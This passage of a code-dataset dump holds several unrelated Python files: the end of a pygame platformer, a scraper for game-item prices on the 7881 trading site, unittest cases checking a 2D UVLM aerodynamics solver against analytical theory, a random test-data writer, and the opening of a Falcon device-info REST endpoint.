self.screen.fill((0, 0, 0))\r\n camera.update(player)\r\n for bullet in bullet_group: \r\n bullet.update(enemy_group if bullet.flag_to_diff == 'enemy'\r\n else player, platforms_group, SCREEN_WIDTH) \r\n for end in end_group:\r\n if end.update(player):\r\n sleep(1)\r\n return True\r\n for group in groups_to_update_with_camera:\r\n for sprite in group:\r\n camera.apply(sprite)\r\n camera.word_r, camera.word_l = False, False\r\n camera.word_up, camera.word_down = False, False\r\n checkpoint = player.update(*actions_list, platforms_group,\r\n bullet_group,\r\n [fire_group, enemy_group],\r\n checkpoint, save_group) \r\n \r\n all_sprites.draw(self.screen)\r\n \r\n pygame.display.flip()\r\n self.clock.tick(FPS)\r\n\r\n\r\n# Фон\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, background_group):\r\n super().__init__(background_group)\r\n self.image = pygame.transform.scale(load_image(GAME_BACKGROUND),\r\n (SCREEN_WIDTH, SCREEN_HEIGHT))\r\n self.rect = self.image.get_rect()\r\n \r\n# Камера \r\nclass Camera:\r\n def __init__(self, update_group):\r\n self.update_group = update_group\r\n self.dx = SCREEN_WIDTH\r\n self.dy = SCREEN_HEIGHT\r\n self.word_r = False\r\n self.word_l = False\r\n self.word_up = False\r\n self.word_down = False\r\n\r\n def apply(self, obj):\r\n if self.word_r:\r\n obj.rect.x -= self.dx\r\n if self.word_l:\r\n obj.rect.x += self.dx\r\n if self.word_up:\r\n obj.rect.y -= self.dy\r\n if self.word_down:\r\n obj.rect.y += self.dy \r\n \r\n def update(self, target):\r\n if target.rect.x >= SCREEN_WIDTH:\r\n self.word_r = True\r\n if target.rect.x <= 0:\r\n self.word_l = True\r\n if target.rect.y >= SCREEN_HEIGHT:\r\n self.word_up = True\r\n if target.rect.y <= 0:\r\n self.word_down = True\r\n \r\n\r\nif __name__ == '__main__':\r\n # Определение переменных\r\n FPS = 60\r\n START_BACKGROUND = 'start_background.png'\r\n END_BACKGROUND = 'end_background.png'\r\n LEVEL_FILENAME = 'level.txt'\r\n SYMB_FOR_PLATFORM_IN_LEVEL_FILE = '#'\r\n SYMB_FOR_PLAYER_IN_LEVEL_FILE = '@'\r\n SYMB_FOR_FIRE_IN_LEVEL_FILE = 'F'\r\n DCT_FOR_MOVING_PLAYER = {pygame.K_w: 2, pygame.K_a: 1, pygame.K_d: 0}\r\n GAME_BACKGROUND = 'game_background.png'\r\n\r\n main = Main()","sub_path":"pygame_project_1.py","file_name":"pygame_project_1.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"60834610","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\ndef get_7881():\n headers = {'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n url = 'https://search.7881.com/list.html?pageNum=1&gameId=G5569>id=100001&carrierId=0&groupId=G5569P002&serverId=G5569P002028&mobileGameType=&faceId=&tradeType=&tradePlace=&shopSortTypeCode=1&sortType=default&listSearchKeyWord=&mainSearchKeyWord=&minPrice=&maxPrice=&otherFilterValue=313346%3D%E8%81%94%E7%9B%9F&rentalByHourStart=&rentalByHourEnd=&propertiess=&chiledPropertiess=&platformId=&platformName=&order=&loginMethod=&rGameId=&tagName=&priceTag=&instock=false&quickChoose=0'\n res = requests.get(url=url, headers=headers)\n contents = BeautifulSoup(res.text, 'html.parser')\n total_price = contents.find('div', class_=\"list-item\").find('div',class_=\"list-v part-02\")\n re_total_price = re.findall('[1-9]\\d*.\\d*|0.\\d*[1-9]\\d*', total_price.text)\n per_price = contents.find('div', class_=\"list-item\").find('div',class_=\"list-v part-03\").find('p').find('em')\n total_g = float(re_total_price[0])/float(per_price.text)\n print('7881当前最低单价为%.4f,总量为%d'%((float(per_price.text)), int(total_g)))\n","sub_path":"g7881.py","file_name":"g7881.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"465578823","text":"'''\n@author: salvatore maraniello\n@date: 23 May 2017\n@brief: tests for 2D UVLM dynamic solver\n@note: \n\nReferences:\n[1] Simpson, R.J.S., Palacios, R. & Murua, J., 2013. Induced-Drag \n\tCalculations in the Unsteady Vortex Lattice Method. AIAA Journal, 51(7), \n\tpp.1775–1779.\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#ahahahah\n\n\nimport uvlm2d_dyn as uvlm\nimport pp_uvlm2d as pp\nimport analytical as an\nimport set_dyn, set_gust\nimport save\n\nimport unittest\nfrom IPython import embed\n\n\n\nclass Test_dyn(unittest.TestCase):\n\t'''\n\tEach method defined in this class contains a test case.\n\t@warning: by default, only functions whose name starts with 'test' will be \n\trun during testing.\n\t'''\n\n\n\tdef setUp(self):\n\t\t''' Common piece of code to initialise the test '''\n\t\tpass\n\n\n\tdef test_steady(self):\n\t\t'''\n\t\tCalculate steady case / very short wake can be used.\n\t\t'''\n\n\n\t\t##### Plate at an angle\n\t\tc=3.\n\t\tb=0.5*c\n\t\tuinf=20.0\n\t\tT=1.0\n\t\tMList=[1,4,8]\n\t\tWakeFact=2\n\n\t\tTimeList=[]\n\t\tTHCFList=[]\n\t\tfor mm in range(len(MList)):\n\t\t\tM=MList[mm]\n\t\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t\t \t alpha=2.*np.pi/180.,rho=1.225)\n\t\t\tS.build_flat_plate()\n\t\t\tS.eps_Hall=0.003\n\t\t\tS.solve_dyn_Gamma2d()\n\t\t\tTimeList.append(S.time)\n\t\t\tTHCFList.append(S.THFaero/S.qinf/S.chord)\n\n\n\t\tclist=['k','r','b','0.6',]\n\t\tfig = plt.figure('Aerodynamic forces',(10,6))\n\t\t#\n\t\tax=fig.add_subplot(131)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,1],clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\t\t#\n\t\tax=fig.add_subplot(132)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,1]/S.alpha,clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('CL alpha')\n\t\tax.legend()\n\t\t#\n\t\tax=fig.add_subplot(133)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(TimeList[mm],THCFList[mm][:,0],clist[mm],\n\t\t\t\t label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Drag')\n\t\tax.legend()\t\n\t\t#plt.show()\n\n\n\t\t##### Plate with velocity\n\t\tM=4\n\t\tS=uvlm.solver(T=5.,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t\t \t alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\taeff=3.*np.pi/180.\n\t\twplate=-np.tan(aeff)*uinf\n\t\tS.dZetadt[:,1]=wplate\n\t\tfor tt in range(1,S.NT):\n\t\t\tS.THZeta[tt,:,1]=wplate*S.time[tt]\n\t\tS.eps_Hall=0.003\n\t\tS.solve_dyn_Gamma2d()\n\n\t\tqinf_eff=0.5*S.rho*np.linalg.norm([uinf,wplate])**2\n\t\tTHCF=S.THFaero/S.chord/qinf_eff\n\t\tcaeff,saeff=np.cos(aeff),np.sin(aeff)\n\t\tCmat=np.array([[caeff,saeff],[-saeff,caeff]])\n\t\tfor tt in range(S.NT):\n\t\t\tTHCF[tt,:]=np.dot(Cmat,THCF[tt,:])\n\n\t\tfig = plt.figure('Aerodynamic forces in wind coord.',(10,6))\n\t\tax=fig.add_subplot(131)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,1],'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Perpendicular')\n\t\t#\n\t\tax=fig.add_subplot(132)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,1]/aeff,'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Perpendicular - coefficient')\n\t\t#\n\t\tax=fig.add_subplot(133)\n\t\tfor mm in range(len(MList)):\n\t\t\tax.plot(S.time,THCF[:,0],'k',label=r'M=%.2d'%MList[mm])\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_title('Tangent')\n\t\tplt.show()\n\n\n\tdef test_plunge(self,case=1,M=8,WakeFact=15):\n\t\t'''\n\t\tPlunge motion at a fixed reduced frequency\n\t\t'''\n\n\t\t### random geometry\n\t\tc=3.\n\t\tb=0.5*c\n\n\t\t### motion [Ref.[1]]\n\t\tif case==1:\n\t\t\tktarget=.1\n\t\t\tH=0.2*b\n\t\t\tNcycles=10.\n\t\tif case==2:\n\t\t\tktarget=1.\n\t\t\tH=0.02*b\n\t\t\tNcycles=16.\n\t\tif case==3:\n\t\t\tktarget=.5\n\t\t\tH=0.05*b\n\t\t\tNcycles=12.\t\n\t\tif case==4:\n\t\t\tktarget=.25\n\t\t\tH=0.2*b\n\t\t\tNcycles=10.\t\t\n\t\tif case==5:\n\t\t\tktarget=.5\n\t\t\tH=0.2*b\n\t\t\tNcycles=12.\t\n\t\tif case==6:\n\t\t\tktarget=.75\n\t\t\tH=0.2*b\n\t\t\tNcycles=5\n\n\t\tf0=10.#Hz\n\t\tw0=2.*np.pi*f0 #rad/s\n\t\tuinf=b*w0/ktarget\n\t\t# Numerical solution\n\t\tT=2.*np.pi*Ncycles/w0\n\n\t\t###### Numerical solution\n\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t \t alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\tS=set_dyn.plunge(S,f0=f0,H=H)\n\t\tS.eps_Hall=0.003\n\t\tS._update_AIC=True\n\t\tS._quasi_steady=False\n\t\tS.solve_dyn_Gamma2d()\n\n\t\tS.save(savedir='./res_plunge/k%.2d/'%(ktarget*10),\n\t\t h5filename='M%.2dwk%.2dcyc%.2d'%(M,WakeFact,Ncycles))\n\n\t\t##### Analytical solution\n\t\t# Garrik - induced drag\n\t\tCdv=an.garrick_drag_plunge(w0,H,S.chord,S.rho,uinf,S.time)\n\t\thv=-H*np.cos(w0*S.time)\n\t\tdhv=w0*H*np.sin(w0*S.time)\n\t\taeffv_an=np.arctan(-dhv/uinf)\n\t\t# Theodorsen - lift\n\t\tLtot_an, Lcirc_an, Lmass_an = an.theo_lift(w0,A=0,H=H,c=S.chord,\n\t\t\t\t\t\t\t\t\t rhoinf=S.rho,uinf=S.Uinf[0],x12=0.0)\n\t\tph_tot,ph_circ,ph_mass=np.angle(Ltot_an),np.angle(Lcirc_an),np.angle(Lmass_an)\n\t\thc_an=H/S.chord*np.cos(w0*S.time)\n\t\tCLtot_an=np.abs(Ltot_an)*np.cos(w0*S.time+ph_tot)/ (S.chord*S.qinf)\n\t\tCLcirc_an=np.abs(Lcirc_an)*np.cos(w0*S.time+ph_circ)/ (S.chord*S.qinf)\n\t\tCLmass_an=np.abs(Lmass_an)*np.cos(w0*S.time+ph_mass)/ (S.chord*S.qinf)\n\n\t\t##### Post-process numerical solution\n\t\taeffv_num=aeffv_an # derivative is the same as analytical\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass=np.zeros((S.NT,2))\n\t\tfor tt in range(S.NT):\n\t\t\tTHCFmass[tt,:]=S.THFmassC[tt,:,:].sum(0)/S.qinf/S.chord\n\t\tTHCFcirc=THCF-THCFmass\n\t\t# Approximation of added mass\n\t\tTHCFmass_approx=np.zeros((S.NT))\n\t\tGtot_old=0.0\n\t\tfor tt in range(1,S.NT):\n\t\t\tGtot_new=S.THgamma[tt,:].sum()\n\t\t\tdgtot=Gtot_new-Gtot_old\n\t\t\tGtot_old=Gtot_new\n\t\t\tTHCFmass_approx[tt]=-S.rho*dgtot/S.dt/S.qinf\n\n\n\t\t##### Lift check - Numerical vs. Theodorsen\n\t\tfig = plt.figure('Lift coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\t### numerical\n\t\tax.plot(S.time, THCF[:,1],'k',lw=1,label='Num Tot')\n\t\t#ax.plot(S.time, THCFmass[:,1],'b',lw=1,label='Num Mass')\n\t\t#ax.plot(S.time, THCFcirc[:,1],'r',lw=1,label='Num Circ')\n\t\t### approximation\n\t\tax.plot(S.time, THCFmass_approx, 'y^', label='Approx Mass')\n\t\t# Theodorsen\n\t\tax.plot(S.time, CLtot_an,'k--',lw=2,label='An Tot')\n\t\t#ax.plot(S.time, CLmass_an,'b--',lw=2,label='An Mass')\n\t\t#ax.plot(S.time, CLcirc_an,'r--',lw=2,label='An Circ')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\n\n\t\tfig = plt.figure('Drag coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(S.time, THCF[:,0],'k',label='Num Tot')\n\t\t#ax.plot(S.time, THCFmass[:,0],'b',label='Num Mass')\n\t\t#ax.plot(S.time, THCFcirc[:,0],'r',label='Num Circ')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Drag')\n\t\tax.legend()\n\t\tplt.show()\n\n\t\tfig = plt.figure('Induced drag in plunge motion - Phase vs kinematics',\n\t\t\t (10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(180./np.pi*aeffv_an,Cdv,'k',label=r'Analytical')\n\t\tax.plot(180./np.pi*aeffv_num,THCF[:,0],'b',label=r'Numerical')\n\t\tax.set_xlabel('deg')\n\t\tax.legend()\n\t\tfig.savefig('./figs/M%.2dW%.3dK%.2d_CD_F%.1dC%.1d_N%.2d_eps%.2e.png'\n\t\t\t %(M,WakeFact,10*ktarget,f0,c,Ncycles,S.eps_Hall) )\n\n\n\t\t# Time histories of circulation\n\t\tfig = plt.figure('Vortex rings circulation time history',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t\tmm=Mlist[kk]\n\t\t\tax.plot(S.time,S.THGamma[:,mm],color=clist[kk],label='M=%.2d'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t\tmm=Mlist[kk]\n\t\t\tax.plot(S.time,S.THGammaW[:,mm],color=clist[kk],label='Mw=%.2d'%(mm))\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('Gamma')\n\t\tax.legend()\n\t\tplt.show()\n\n\n\t\t# fig = plt.figure('Aero force at TE',(10,6))\n\t\t# ax=fig.add_subplot(111)\n\t\t# ax.plot(S.time,S.THFdistr[:,-1,0],'k',label=r'drag')\n\t\t# ax.plot(S.time,S.THFdistr[:,-1,1],'b',label=r'lift')\n\t\t# ax.set_xlabel('time')\n\t\t# ax.set_ylabel('force')\n\t\t# ax.legend()\n\t\t# plt.show()\n\n\n\t\t# ### plot net intensity of vortices along the aerofoil\n\t\t# for mm in range(S.M):\n\t\t# \tplt.plot(S.time,S.THgamma[:,mm],label='M=%.2d' %mm)\n\t\t# \tplt.xlabel('time [s]')\n\t\t# plt.legend(ncol=2)\n\t\t# plt.show()\n\n\t\t# # verify kutta condition\n\t\t# gte=np.zeros((S.NT))\n\t\t# for tt in range(1,S.NT):\n\t\t# \tGtot_old=np.sum(S.THgamma[tt-1,:])\n\t\t# \tGtot_new=np.sum(S.THgamma[tt,:])\n\t\t# \tgte[tt]=-(Gtot_new-Gtot_old)\n\t\t# fig = plt.figure('Net vorticity at TE',(10,6))\n\t\t# ax=fig.add_subplot(111)\n\n\t\t# ax.plot(S.time,S.THgammaW[:,0],color='k',label='Numerical')\n\t\t# ax.plot(S.time,gte,'r--',lw=2,label='Verification')\n\n\t\t# ax.set_xlabel('time')\n\t\t# ax.set_ylabel('Gamma')\n\t\t# ax.legend()\n\t\t# plt.show()\n\n\n\n\tdef test_sin_gust(self):\n\n\t\t'''\n\t\tPlunge motion at a fixed reduced frequency\n\t\t'''\n\n\t\t# random geometry\n\t\tc=3.\n\t\tb=0.5*c\n\n\t\t# gust profile\n\t\tw0=0.003\n\t\tuinf=2.0\n\t\tL=10.0*c # <--- gust wakelength\n\n\t\t# discretisation\n\t\tWakeFact=10\n\t\tNcycles=10 # number of \"cycles\"\n\t\tMfact=2\n\t\tif c>L: M=np.ceil(4*Mfact*c/L)\n\t\telse: M=Mfact*4\n\n\t\t# Numerical solution\n\t\tS=uvlm.solver(T=Ncycles*L/uinf,M=M,Mw=M*WakeFact,b=b,\n\t\t\t Uinf=np.array([uinf,0.]),alpha=0.*np.pi/180.,rho=1.225)\n\t\tS.build_flat_plate()\n\t\tS=set_gust.sin(S,w0,L,ImpStart=False)\n\t\tS.eps_Hall=0.003\n\t\tS.solve_dyn_Gamma2d()\n\n\t\t# Analytical solution\n\t\tCLv = an.sears_lift_sin_gust(w0,L,uinf,c,S.time)\t\t\n\n\t\t# Post-process\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\tfig = plt.figure('Aerodynamic force coefficients',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.set_title(r'Lift')\n\t\t#ax.plot(S.time,THCF[:,0],'b',label=r'Drag')\n\t\tax.plot(S.time,THCF[:,1],'k',label=r'UVLM')\n\t\tax.plot(S.time,CLv,'r',label=r\"Sear's\")\n\t\tax.legend()\n\n\t\t# visualise wake TH\n\t\tfig=plt.figure('Wake TH', figsize=[10.,6.0])\n\t\tax=fig.add_subplot(121)\n\t\tax.set_title('Snapshots')\n\t\tfor ii in range(int(Ncycles/2)):\n\t\t\ttt= 2*ii*4*Mfact\n\t\t\tax.plot(S.THZetaW[tt,:,0],S.THZetaW[tt,:,1],\n\t\t\t\t label=r'%.2e' %S.time[tt])\n\t\tax.set_xlabel('x [m]')\n\t\tax.set_xlabel('y [m]')\n\t\tax.legend()\n\n\n\t\tax=fig.add_subplot(122)\n\t\tax.set_title('TH specific points')\n\t\tNpoints=5\n\t\tfor ii in range(0,S.Kw,int(S.Kw/(Npoints+1))):\n\t\t\tax.plot(S.time,S.THZetaW[:,ii,1],label=r'x=%.2e m' %S.ZetaW[ii,0] )\n\t\tax.set_xlabel('time [s]')\n\t\tax.set_xlabel('y [m]')\n\t\tax.legend()\n\n\t\tplt.show()\n\n\n\n\tdef test_impulse(self,M=4,WakeFact=10):\n\t\t'''\n\t\tImpulsive start - Wagner solution\n\t\t'''\n\n\t\t### random geometry\n\t\tM=6\n\t\tWakeFact=20\n\t\tc=3.\n\t\tb=0.5*c\n\t\tuinf=20.0\n\t\taeff=1.0*np.pi/180.\n\t\tT=5.0\n\n\t\t###### Numerical solution - Hall's correction\n\t\tS=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t alpha=aeff)\n\t\tS.build_flat_plate()\n\t\tS._imp_start=True\n\t\tS.eps_Hall=0.003\n\t\tS._update_AIC=True\n\t\tS.solve_dyn_Gamma2d()\n\n\t\t###### Numerical solution - no Hall's correction\n\t\tS2=uvlm.solver(T=T,M=M,Mw=M*WakeFact,b=b,Uinf=np.array([uinf,0.]),\n\t\t alpha=aeff)\n\t\tS2.build_flat_plate()\n\t\tS2._imp_start=True\n\t\tS2.eps_Hall=1.0\n\t\tS2._update_AIC=True\n\t\tS2.solve_dyn_Gamma2d()\n\n\t\t##### Analytical solution\n\t\tCLv_an=an.wagner_imp_start(aeff,uinf,c,S.time)\n\n\t\t##### Post-process numerical solution - Hall's correction\n\t\tTHCF=S.THFaero/S.qinf/S.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass=np.zeros((S.NT,2))\n\t\tfor tt in range(S.NT):\n\t\t THCFmass[tt,:]=S.THFmassC[tt,:,:].sum(0)/S.qinf/S.chord\n\t\tTHCFcirc=THCF-THCFmass\n\n\t\t##### Post-process numerical solution - no Hall's correction\n\t\tTHCF2=S2.THFaero/S2.qinf/S2.chord\n\t\t# Mass and circulatory contribution\n\t\tTHCFmass2=np.zeros((S2.NT,2))\n\t\tfor tt in range(S2.NT):\n\t\t THCFmass2[tt,:]=S2.THFmassC[tt,:,:].sum(0)/S2.qinf/S2.chord\n\t\tTHCFcirc2=THCF2-THCFmass2\n\n\n\n\t\tplt.close('all')\n\t\t# non-dimensional time\n\t\tsv=2.0*S.Uabs*S.time/S.chord\n\t\tfig = plt.figure('Lift coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\t# Wagner\n\t\tax.plot(0.5*sv, CLv_an,'0.6',lw=3,label='An Tot')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF[:,1],'k',lw=1,label='Num Tot - Hall')\n\t\tax.plot(0.5*sv, THCFmass[:,1],'b',lw=1,label='Num Mass - Hall')\n\t\tax.plot(0.5*sv, THCFcirc[:,1],'r',lw=1,label='Num Jouk - Hall')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF2[:,1],'k--',lw=2,label='Num Tot')\n\t\tax.plot(0.5*sv, THCFmass2[:,1],'b--',lw=2,label='Num Mass')\n\t\tax.plot(0.5*sv, THCFcirc2[:,1],'r--',lw=2,label='Num Jouk')\n\t\tax.set_xlabel(r'$s/2=U_\\infty t/c$')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\n\t\tfig2 = plt.figure('Lift coefficient - zoom',(10,6))\n\t\tax=fig2.add_subplot(111)\n\t\t# Wagner\n\t\tax.plot(0.5*sv, CLv_an,'0.6',lw=3,label='An Tot')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF[:,1],'k',lw=1,label='Num Tot - Hall')\n\t\tax.plot(0.5*sv, THCFmass[:,1],'b',lw=1,label='Num Mass - Hall')\n\t\tax.plot(0.5*sv, THCFcirc[:,1],'r',lw=1,label='Num Jouk - Hall')\n\t\t# numerical\n\t\tax.plot(0.5*sv, THCF2[:,1],'k--',lw=2,label='Num Tot')\n\t\tax.plot(0.5*sv, THCFmass2[:,1],'b--',lw=2,label='Num Mass')\n\t\tax.plot(0.5*sv, THCFcirc2[:,1],'r--',lw=2,label='Num Jouk')\n\t\tax.set_xlabel(r'$s/2=U_\\infty t/c$')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Lift')\n\t\tax.legend()\n\t\tax.set_xlim(0.,6.)\n\n\t\tfig = plt.figure('Drag coefficient',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tax.plot(S.time, THCF[:,0],'k',label='Num Tot')\n\t\tax.plot(S.time, THCFmass[:,0],'b',label='Num Mass')\n\t\tax.plot(S.time, THCFcirc[:,0],'r',label='Num Jouk')\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('force')\n\t\tax.set_title('Drag')\n\t\tax.legend()\n\n\t\t# Tiome histories of circulation\n\t\tfig = plt.figure('Vortex rings circulation time history',(10,6))\n\t\tax=fig.add_subplot(111)\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S.time,S.THGamma[:,mm],color=clist[kk],\n\t\t \t label='M=%.2d - Hall'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S.time,S.THGammaW[:,mm],color=clist[kk],\n\t\t \t label='Mw=%.2d - Hall'%(mm))\n\t\tclist=['0.2','0.4','0.6']\n\t\tMlist=[0,int(S.M/2),S.M-1]\n\t\tfor kk in range(len(Mlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S2.time,S2.THGamma[:,mm],color=clist[kk],linestyle='--',\n\t\t label='M=%.2d'%(mm))\n\t\tclist=['r','y','b']\n\t\tMWlist=[0,int(S.Mw/2),S.Mw-1]\n\t\tfor kk in range(len(MWlist)):\n\t\t mm=Mlist[kk]\n\t\t ax.plot(S2.time,S2.THGammaW[:,mm],color=clist[kk],linestyle='--',\n\t\t label='Mw=%.2dl'%(mm))\n\n\t\tax.set_xlabel('time')\n\t\tax.set_ylabel('Gamma')\n\t\tax.legend(ncol=2)\n\t\tplt.show()\n\n\n\n\n\n\n\nif __name__=='__main__':\n\n\n\tT=Test_dyn()\n\t\n\n\t### steady\n\tT.test_steady()\n\t\n\t### plunge motion\n\tT.test_plunge(case=1,M=6,WakeFact=10)\n\n\t### gust response\n\tT.test_sin_gust()\n\n\t# wagner\n\tT.test_impulse(M=2,WakeFact=10)\n\n\n\n\n\n\n\n","sub_path":"test_dyn.py","file_name":"test_dyn.py","file_ext":"py","file_size_in_byte":14692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"86765905","text":"# -*- coding: utf-8 -*-\nimport random\nimport time\nfrom datetime import datetime\nfrom watercourse.model import Pond\n\n\nseed = 'abcdefghijklmnopqrstuvwxyz0123456789'\nSEED = ''.join([seed for i in range(10)])\nTIMESTART_STR = '2016-01'\nMILLISECOND = 1\nTIMESTART = int(time.mktime(datetime.strptime(TIMESTART_STR,\n '%Y-%m').timetuple())) * MILLISECOND\nTIME_STEP = 3600 * MILLISECOND\n\nUSERS_BATCH = [\n 'useractivitystorytest/9krapvh7nqvcb82vte8jtw4n746ul5d4qbatch',\n 'useractivitystorytest/3z44orw8cvq97b02r1gg2but61itaqmx3batch',\n 'useractivitystorytest/31lsda9th6tkdilcyj81qoayhr8iygpx4batch',\n 'useractivitystorytest/9wb2e6mgf1xpy5nk49plasak2ybdo6rpebatch',\n 'useractivitystorytest/k75szk931ghz8jsd39vzqo3oy9q7zfewrbatch',\n 'useractivitystorytest/vlxphdf6i6wnqfsrvd1ko9ag4mdful7g3batch',\n 'useractivitystorytest/cby5afjzyimhuo2w03ugz4i2d3u0e36mebatch',\n 'useractivitystorytest/1h8di9a0hmgkq527oveoxtyvf9yt0ow7tbatch',\n 'useractivitystorytest/iffexkp87bdoqhq6fzxj1lp4zr8ampa8cbatch',\n 'useractivitystorytest/8q2l7n7d9xe52i2kgeydbhscrvt0gjcgubatch',\n 'useractivitystorytest/9krapvh7nqvcb82vte8jtw4n746ul5d4qhctab',\n 'useractivitystorytest/3z44orw8cvq97b02r1gg2but61itaqmx3hctab']\n\nSTRINGKEY = 'ceshi0'\n\nENDMONTH = '2016-03'\nTIMEEND = int(time.mktime(datetime.strptime(ENDMONTH,\n '%Y-%m').timetuple())) * MILLISECOND\n\n\ndef random_str(strlen):\n _en_str = ''.join(random.sample(SEED, strlen))\n en_str = u'测试中文,,,,' + _en_str + u'中文字符'\n return {STRINGKEY: en_str}\n\n\ndef random_str_list(listlen):\n strlen = random.randint(8, 128)\n return [random_str(strlen) for i in range(listlen)]\n\n\ndef insert_records_batch():\n timeend = TIMEEND\n timestamp = TIMESTART\n cab = Pond(home='/home/liujinliu/tmp/cabineTest')\n while timestamp < timeend:\n random.shuffle(USERS_BATCH)\n user_ids = USERS_BATCH[0:10]\n timestamp += TIME_STEP\n batches = []\n for user_id in user_ids:\n listlen = random.randint(3, 50)\n record = random_str_list(listlen)\n batches.append(dict(uid=user_id, timestamp=timestamp,\n doc=record[::-1]))\n cab.batch_write(batches)\n\n\nif __name__ == '__main__':\n insert_records_batch()\n","sub_path":"src/test/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"12413829","text":"import json\nimport uuid\nimport falcon\nfrom sciencecache_model import *\nfrom playhouse.shortcuts import dict_to_model, model_to_dict\nfrom utilities import *\nimport smtplib\nfrom email.mime.text import MIMEText\n\nclass deviceinfo_end_point():\n\n\n @falcon.before(check_logged_in)\n def on_get(self, request, response, deviceinfo_id = None):\n\n\n results =[]\n try:\n with sciencecache_database.transaction():\n\n if (deviceinfo_id is not None):\n deviceinfo = Deviceinfo.get_by_id(deviceinfo_id)\n results = model_to_dict(deviceinfo,recurse=True)\n\n\n elif(request.get_param('form')):\n form_id = request.get_param('form')\n for r in Deviceinfo.select().where(Deviceinfo.obs_point_form == form_id):\n results.append(model_to_dict(r, recurse=True))\n\n\n else:\n for r in Deviceinfo.select():\n results.append(model_to_dict(r, recurse=False))\n\n\n except Deviceinfo.DoesNotExist as e:\n raise falcon.HTTPNotFound(\n description='Deviceinfo with deviceinfo_id: ' + str(deviceinfo_id) + ' not found'\n )\n except Exception as e:\n print(e)\n raise falcon.HTTPBadRequest(description=\"Failed to get Deviceinfo\")\n\n response.body = json.dumps(results, default=json_serial)\n\n\n\n def on_post(self, request, response, deviceinfo_id = None):\n\n\n # Do not allow POST (create) when deviceinfo_id is given\n if deviceinfo_id is not None:\n raise falcon.falcon.HTTPMethodNotAllowed(\n allowed_methods=['GET', 'POST', 'PUT','OPTIONS'],\n description='Deviceinfo must be created without an deviceinfo_id'\n )\n\n try:\n # load the request body\n deviceinfo_dict = json.loads(request.stream.read() or 0)\n\n email_token = str(uuid.uuid4())\n\n #sanitize input\n bad_keys = ['id', 'is_validated']\n for key in bad_keys:\n if(key in deviceinfo_dict):\n del 